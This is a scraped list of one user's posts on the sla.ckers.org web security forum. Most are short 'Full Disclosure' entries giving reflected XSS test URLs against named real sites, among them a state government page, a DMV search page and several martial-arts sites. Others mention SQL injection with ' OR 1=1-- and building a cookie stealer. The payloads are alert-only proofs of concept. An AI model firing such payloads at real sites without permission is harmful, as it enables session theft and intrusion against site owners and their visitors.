Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Current Page: 1 of 1
Results 1 - 28 of 28
7 years ago
pheusion
http://www.ct.gov/dps/cwp/eMailPage.asp Several hits, having issue with posting the url though ISEC EDIT: Add the DMV section to the list: http://search.dmv.org/search?w=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83
Forum: Full Disclosure
7 years ago
pheusion
Wow, so much has happened... Been gone for a bit... hope everyone is well Here's one I "stumbled" upon while checking out my 2nd fav site (apart from here of course) http://www.ufc.com/index.cfm?fa=search.results&ss=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2
Forum: Full Disclosure
8 years ago
pheusion
MMA Clothing Co http://www.houseofpainironwear.com/mmanhb.htm search : fromCharCode
Forum: Full Disclosure
8 years ago
pheusion
That Stallowned pic is sweet, I need to learn that vector...
Forum: Full Disclosure
8 years ago
pheusion
http://www.fightingarts.com/reading/get_articles_search.php?word=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C
Forum: Full Disclosure
8 years ago
pheusion
http://www.totalvid.com/searchResults.cfm?strSearch=%22%3E%3CSCRIPT%3Ealert%28%27mma_xss%27%29%3B%3C%2FSCRIPT%3E&x=0&y=0 Sorry if I am posting a bunch, just trying to kill this sour mood I am in, doing something fun...
Forum: Full Disclosure
8 years ago
pheusion
http://www.mmauniverse.com/quicksearchsection.html?src=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%
Forum: Full Disclosure
8 years ago
pheusion
About.com page for MMA: http://martialarts.about.com/sitesearch.htm?terms="><SCRIPT>alert('MMA_XSS');</SCRIPT>&SUName=martialarts&TopNode=4616&type=1
Forum: Full Disclosure
8 years ago
pheusion
Another MMA site.. http://www.fightresource.com/search.php -- XSS Locator #1 --fromCharCode
Forum: Full Disclosure
8 years ago
pheusion
I gotta get in on the Happy Halloween's... http://cards.halloweenhorrors.net/cgi-bin/search/search.pl?log=halhorror&words=%22%3E%3CSCRIPT%3Ealert%28%22Happy+All+Hallow%27s+Eve%22%29%3C%2Fscript%3E to add to the "spooky" of Halloween, I crashed my car on Fri the 13th.. Weird coincindence... No injuries but pride, so it could've been worse..
Forum: Full Disclosure
8 years ago
pheusion
http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCh
Forum: Full Disclosure
8 years ago
pheusion
Hmmm, the link I post in here goes to an error page (Even though when I enter it manually it works) Not an encoding issue but rather the page is using FusionBot.com for search, when I goto it from an external source it fails... Works the search page itself though... The site is: www.brazilianfightwear.com <SCRIPT>alert('VULN');</SCRIPT> Thanks Snake, just saw the BUGS forum ab
Forum: Full Disclosure
8 years ago
pheusion
I found my first MMA site vuln but I need to learn howto post on here...
Forum: Full Disclosure
8 years ago
pheusion
I am in LOVE with FreeSBIE.... I've tried various *BSD's before but theres something about a liveCD that I love...
Forum: OMG Ponies
8 years ago
pheusion
Lol... Sorry
Forum: News and Links
8 years ago
pheusion
Thanks for the info guys...
Forum: SQL and Code Injection
8 years ago
pheusion
NICE Snake... Always good to meet a fellow Tech / BJJ'er.... As you stated, the best way to learn is to build and break it... Getting HTTPD running isnt an issue for me... I just need to read up on building web apps and go the route you suggested...
Forum: News and Links
8 years ago
pheusion
SQL Inj Question: I am just becoming familiar with the ' OR 1=1 type of injections... and have only tested on testing frameworks: IE MightySeek I also have WebGoat installed and ' OR 1=1-- /* is what got me into the admin panel, my question is... Is this really wide spread? I have SQL experience (Only since Ora 8i and OSS based RDBMs) and have never heard of anything like this. Granted I'
Forum: SQL and Code Injection
8 years ago
pheusion
Not a fan of beer myself (Bad for Training) So i'm on the same boat... Good liquor... Honestly, I was thinking the UFC (MMA / NHB / BJJ) arena, alot of Mambo / Joomla sites, usually set up with little tech knowledge, its an arena I am active in, etc... This place doesnt seem like bashing would become prevelant, all of you with knowledge on the subject are more than willing to give suggestion
Forum: News and Links
8 years ago
pheusion
Wow, Maluc I believe I owe you some beers =) It's this type of info right here, real world type of examples that makes this site so valuable. So many other sites are willing to tell certain things, but not like you guys... I would have been using Google and going through results for ages. Picking an industry is an EXCELLENT suggestion and something I can set a goal with. I can't thank ya
Forum: News and Links
8 years ago
pheusion
HAHA... Still a virgin, learning though!! Thanks to you and everyone else... Is it this exciting for everyone else when they pop their cherry? Time to start finding my own me thinks...
Forum: Full Disclosure
8 years ago
pheusion
I just tried my first on the MPAA search... I got a popup and a whole bunch of code returned... So sweet. You guys are an inspiration...
Forum: Full Disclosure
8 years ago
pheusion
Thanks for the info Maluc... I think maybe that was my issue, finding the sites initially... Doing a google search for various patterns or login file types seemed like it was producing results, but I became weary actually trying to inject based off of the cheatsheet.... It seemed like those would be the hardes hit (As every newb such as myself is following the same learning pattern, I would ima
Forum: News and Links
8 years ago
pheusion
Ok, here's a question... I'm not a coder, I dont have a difficult time in keeping up with simple code, but obviously at the moment I do not have the knowledge to code out a "XSS sandbox" type site myself.... Think Perl and *Nix, thats pretty much my level of coding knowledge... simple admin type stuff (Simple scripts to do this or that) With that being the case, I am sure the righ
Forum: News and Links
8 years ago
pheusion
As always Snake, you remind me of why I love this site so much. The newb questions will come soon, everyday I am learning something new and researching, which is honestly, 99% of the fun... Loving the study, makes me feel smart haha Side note: trying to find this post about someone saying they want to kick some A$$.... Whats the background about that? I've got a MMA / BJJ school I help
Forum: News and Links
8 years ago
pheusion
I'm guilty of lurking... with gusto!!... Actually, I've just got so much to read and learn I figured I would get a *small* handle on it before I flood ya with questions.... haha I've been reading the cheatsheet and testing on my own sites, I just finished up a cookie stealer from WhiteAcids tut's yesterday.... It works, to a point, I cant get any valid cookies to go through though.... (I had
Forum: News and Links
8 years ago
pheusion
Works through our Websense setup... (Both xlate as well as some ssh tunnels / proxy) rsnake Wrote: ------------------------------------------------------- > Hmmm... Without even looking at websense it feels > like it would be vulnerable to the normal CGI > proxy stuff (google translator is a perfect > example). Has anyone tried this: > > http://translate.google.com/
Forum: Intro
8 years ago
pheusion
Hello everyone... Came accross your site (Via way of Jeremiah's blog) and thought I would join up.... I have been working with *Nix and security administration most of my professional life. Unfortunately being a Sec admin is far from the excitement that the "other" side seems to have, so I am just educating myself on that end and reading as much as possible. Thank you for havi
Forum: Intro
Current Page: 1 of 1